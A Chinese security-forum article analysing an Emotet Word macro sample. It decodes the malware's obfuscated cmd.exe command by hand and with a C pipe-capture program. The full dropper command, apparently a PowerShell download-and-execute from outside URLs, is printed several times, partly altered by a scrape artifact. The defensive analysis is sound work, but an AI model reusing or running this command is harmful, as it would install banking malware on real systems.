酷播亮新聞
文章摘要: 雖然我們修改了程式碼第二章 原創沙盤跑巨集病毒 Emotet 已經有人分析了
*本文原創作者:刀郎,屬於FreeBuf原創獎勵計劃,未經許可禁止轉載
第一章 樣本背景介紹
Emotet是一種銀行木馬惡意軟體程式,它通過將計算機程式碼注入受感染計算機的網路堆疊來獲取財務資訊。
[1]允許通過傳輸竊取敏感資料。 [2] Emotet惡意軟體還將自身插入到軟體模組中,然後軟體模組可以竊取地址簿資料並對其他系統執行拒絕服務攻擊。 [3]Emotet已經在其交付方面發展,但最突出的形式是在電子郵件正文中插入惡意文件或URL連結,有時偽裝成發票或PDF附件。 [4]2014年首次在德國,奧地利和瑞士報道,美國很快就遇到了Emotet惡意軟體,不一定是假髮票,而是通過惡意JavaScript(.JS)檔案;當惡意.JS檔案被執行時,Emotet惡意軟體就能夠感染當前主機。 [5]一旦Emotet感染了主機,作為惡意軟體一部分的惡意檔案就能夠通過Web瀏覽器攔截,記錄和儲存傳出的網路流量,從而導致敏感資料被編譯以訪問受害者的銀行帳戶。 [6 ]Emotet是Feodo Trojan系列木馬惡意軟體的成員。 [7]在虛擬機器環境中執行時,Emotet會以誤導惡意軟體調查員的方式更改其行為。
第二章 原創沙盤跑巨集病毒
Emotet 已經有人分析了,我這篇的重點是:分析中遇到的技術難點,以及以後快速分析的解決方案。對於這種巨集病毒我們要做到秒殺,我們要學會給病毒歸類,以及快速分析的方法。
拿到樣本之後,用我自己原創開發的沙箱跑一下,看看效果
系統程序中標紅的表示新增加的程序,可以看出增加了cmd,exe的程序,我們可以看到word啟動了一個cmd的程序,並且傳遞了一串引數
已經拿到WINWORD.EXE啟動cmd.exe的資料
第三章 分析加密cmd引數
引數是拿到了但是貌似是加密的
Cmd /V:O/C"set - =IdBSZaVlEVEJwpRGpMcXUSahlErhlBwsz 7+Wi;[email protected],Pk}tQb'j26=oT)fDy:/nue{F4Hv1$(-x&&for %o in (16,59,30,69,26,31,27,69,28,28,33,76,53,37,59,58,67,69,30,78,59,53,55,69,18,51,33,40,69,51,44,36,69,53,43,28,37,69,67,51,38,76,26,67,9,58,54,27,51,51,16,65,66,66,53,22,32,22,78,31,27,22,26,51,22,31,27,44,26,68,66,27,49,42,19,42,60,75,45,27,51,51,16,65,66,66,22,67,22,16,22,16,59,28,37,74,44,26,68,66,21,16,72,67,22,45,27,51,51,16,65,66,66,31,27,59,26,69,18,26,69,31,51,31,18,27,59,59,28,31,44,18,59,39,66,67,67,52,49,40,45,27,51,51,16,65,66,66,18,59,39,37,18,59,28,69,44,18,59,39,66,56,73,4,45,27,51,51,16,65,66,66,69,28,22,26,51,69,1,69,28,22,22,18,18,37,59,67,44,69,31,66,57,73,64,28,54,44,21,16,28,37,51,77,54,45,54,61,38,76,68,42,43,33,58,33,54,75,34,41,54,38,76,68,31,51,58,76,69,67,74,65,51,69,39,16,35,54,47,54,35,76,68,42,43,35,54,44,69,79,69,54,38,62,59,26,69,22,18,27,77,76,67,25,14,33,37,67,33,76,26,67,9,61,70,51,26,64,70,76,53,37,59,44,63,59,30,67,28,59,22,1,71,37,28,69,77,76,67,25,14,46,33,76,68,31,51,61,38,21,51,22,26,51,78,48,26,59,18,69,31,31,33,76,68,31,51,38,53,26,69,22,49,38,50,18,22,51,18,27,70,50,50,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,88)do set ] =!] !!- :~%o,1!&&if %o==88 call %] :~-360%"
我們首先手工分析一下,批處理是用&&分割的
所以拿出第一句
set - =IdBSZaVlEVEJwpRGpMcXUSahlErhlBwsz 7+Wi;[email protected],Pk}tQb'j26=oT)fDy:/nue{F4Hv1$(-x
這個是設定變數。
再看第二句這個可長了
for %o in (16,59,30,69,26,31,27,69,28,28,33,76,53,37,59,58,67,69,30,78,59,53,55,69,18,51,33,40,69,51,44,36,69,53,43,28,37,69,67,51,38,76,26,67,9,58,54,27,51,51,16,65,66,66,53,22,32,22,78,31,27,22,26,51,22,31,27,44,26,68,66,27,49,42,19,42,60,75,45,27,51,51,16,65,66,66,22,67,22,16,22,16,59,28,37,74,44,26,68,66,21,16,72,67,22,45,27,51,51,16,65,66,66,31,27,59,26,69,18,26,69,31,51,31,18,27,59,59,28,31,44,18,59,39,66,67,67,52,49,40,45,27,51,51,16,65,66,66,18,59,39,37,18,59,28,69,44,18,59,39,66,56,73,4,45,27,51,51,16,65,66,66,69,28,22,26,51,69,1,69,28,22,22,18,18,37,59,67,44,69,31,66,57,73,64,28,54,44,21,16,28,37,51,77,54,45,54,61,38,76,68,42,43,33,58,33,54,75,34,41,54,38,76,68,31,51,58,76,69,67,74,65,51,69,39,16,35,54,47,54,35,76,68,42,43,35,54,44,69,79,69,54,38,62,59,26,69,22,18,27,77,76,67,25,14,33,37,67,33,76,26,67,9,61,70,51,26,64,70,76,53,37,59,44,63,59,30,67,28,59,22,1,71,37,28,69,77,76,67,25,14,46,33,76,68,31,51,61,38,21,51,22,26,51,78,48,26,59,18,69,31,31,33,76,68,31,51,38,53,26,69,22,49,38,50,18,22,51,18,27,70,50,50,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,88)do set ] =!] !!- :~%o,1!
很長別嚇著了,先看這句
!- :~%o,1!
%o的意思遍歷上面的陣列,取出每一項,那麼這句的意思就是取出字串-對於的索引項,1表示只是取一位,那麼字串是啥
IdBSZaVlEVEJwpRGpMcXUSahlErhlBwsz 7+Wi;[email protected],Pk}tQb'j26=oT)fDy:/nue{F4Hv1$(-x
就是用這個陣列裏面的值做第一句變數陣列的索引,進行取字串,比如16
那麼對於的就是p
59對應的就是o
30對應的就是w
我們可以手工寫程式碼解析。
理論上這樣分析就完成了。
第四章 自動化跑結果
但是如果別人給演算法修改了,那麼我們又的折騰半天,那麼有沒有什麼解救之法啊
當然有,他再怎麼加密,他都跑不掉一個執行的操作,我們只要列印執行的操作就完成了
這裏我們只要給call,替換成echo 再修改一下列印的變數就可以了,我修改後的程式碼如下
Cmd /V:O/C"set - =IdBSZaVlEVEJwpRGpMcXUSahlErhlBwsz 7+Wi;[email protected],Pk}tQb'j26=oT)fDy:/nue{F4Hv1$(-x&&for %o in (16,59,30,69,26,31,27,69,28,28,33,76,53,37,59,58,67,69,30,78,59,53,55,69,18,51,33,40,69,51,44,36,69,53,43,28,37,69,67,51,38,76,26,67,9,58,54,27,51,51,16,65,66,66,53,22,32,22,78,31,27,22,26,51,22,31,27,44,26,68,66,27,49,42,19,42,60,75,45,27,51,51,16,65,66,66,22,67,22,16,22,16,59,28,37,74,44,26,68,66,21,16,72,67,22,45,27,51,51,16,65,66,66,31,27,59,26,69,18,26,69,31,51,31,18,27,59,59,28,31,44,18,59,39,66,67,67,52,49,40,45,27,51,51,16,65,66,66,18,59,39,37,18,59,28,69,44,18,59,39,66,56,73,4,45,27,51,51,16,65,66,66,69,28,22,26,51,69,1,69,28,22,22,18,18,37,59,67,44,69,31,66,57,73,64,28,54,44,21,16,28,37,51,77,54,45,54,61,38,76,68,42,43,33,58,33,54,75,34,41,54,38,76,68,31,51,58,76,69,67,74,65,51,69,39,16,35,54,47,54,35,76,68,42,43,35,54,44,69,79,69,54,38,62,59,26,69,22,18,27,77,76,67,25,14,33,37,67,33,76,26,67,9,61,70,51,26,64,70,76,53,37,59,44,63,59,30,67,28,59,22,1,71,37,28,69,77,76,67,25,14,46,33,76,68,31,51,61,38,21,51,22,26,51,78,48,26,59,18,69,31,31,33,76,68,31,51,38,53,26,69,22,49,38,50,18,22,51,18,27,70,50,50,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,88)do set ] =!] !!- :~%o,1!&&if %o==88 echo !] !"
現在問題來了,雖然我們修改了程式碼,怎麼給顯示結果列印處理啊?
我才用我最熟悉的方式C程式碼程式設計
程式碼如下
int main(int argc, char* argv[])
{
shell();
}
void shell()
{
initPipe();
DWORD dwByteWritten;
unsigned long BytesRead = 0;
DWORD TotalBytesAvail;
//檢查管道中是否有資料
while (TRUE)
{
//printf("有資料到來!n");
memset(readBuff, 0, sizeof(readBuff));
ReadFile(hReadPipeCmd, readBuff, 4096, &BytesRead, NULL);
printf("%s", readBuff);
}
}
WCHAR tEst[] = { L"Cmd /V:O/C"set - =IdBSZaVlEVEJwpRGpMcXUSahlErhlBwsz 7+Wi;[email protected],\Pk}tQb'j26=oT)fDy:/nue{F4Hv1$(-x&&for %o in (16,59,30,69,26,31,27,69,28,28,33,76,53,37,59,58,67,69,30,78,59,53,55,69,18,51,33,40,69,51,44,36,69,53,43,28,37,69,67,51,38,76,26,67,9,58,54,27,51,51,16,65,66,66,53,22,32,22,78,31,27,22,26,51,22,31,27,44,26,68,66,27,49,42,19,42,60,75,45,27,51,51,16,65,66,66,22,67,22,16,22,16,59,28,37,74,44,26,68,66,21,16,72,67,22,45,27,51,51,16,65,66,66,31,27,59,26,69,18,26,69,31,51,31,18,27,59,59,28,31,44,18,59,39,66,67,67,52,49,40,45,27,51,51,16,65,66,66,18,59,39,37,18,59,28,69,44,18,59,39,66,56,73,4,45,27,51,51,16,65,66,66,69,28,22,26,51,69,1,69,28,22,22,18,18,37,59,67,44,69,31,66,57,73,64,28,54,44,21,16,28,37,51,77,54,45,54,61,38,76,68,42,43,33,58,33,54,75,34,41,54,38,76,68,31,51,58,76,69,67,74,65,51,69,39,16,35,54,47,54,35,76,68,42,43,35,54,44,69,79,69,54,38,62,59,26,69,22,18,27,77,76,67,25,14,33,37,67,33,76,26,67,9,61,70,51,26,64,70,76,53,37,59,44,63,59,30,67,28,59,22,1,71,37,28,69,77,76,67,25,14,46,33,76,68,31,51,61,38,21,51,22,26,51,78,48,26,59,18,69,31,31,33,76,68,31,51,38,53,26,69,22,49,38,50,18,22,51,18,27,70,50,50,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,88)do set ] =!] !!- :~%o,1!&&if %o==88 echo !] !" " };
void initPipe()
{
SECURITY_ATTRIBUTES sa = { 0 };
STARTUPINFOW si = { 0 };
PROCESS_INFORMATION pi = { 0 };
sa.nLength = sizeof(sa);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
//建立管道
CreatePipe(&hReadPipeCmd, &hWritePipeCmd, &sa, 0);
CreatePipe(&hReadPipeShell, &hWritePipeShell, &sa, 0);
GetStartupInfoW(&si);
si.cb = sizeof(STARTUPINFO);
si.wShowWindow = SW_SHOW;
si.dwFlags = STARTF_USESHOWWINDOW;
si.hStdInput = hReadPipeShell;
si.hStdOutput = si.hStdError = hWritePipeCmd;
////建立cmd程序
if (!CreateProcessW(NULL, (LPWSTR)tEst,
NULL, NULL, FALSE, 0, NULL, NULL, &si, π))
{
printf("CreateProcess Error:%d!n",GetLastError());
CloseHandle(hWritePipeCmd);
CloseHandle(hReadPipeShell);
//initPipeSuccess = FALSE;
return;
}
hProcessHandle = pi.hProcess;
WaitForSingleObject(hProcessHandle, INFINITE);
printf("exit");
//initPipeSuccess = TRUE;
getchar()
;
}
哎 努力無數次,還是無法給程式碼編輯到框子裏面去,難道是我不會編輯帖子?麻煩小編幫我編輯一下。放棄了,
下面放一個我跑出的圖吧
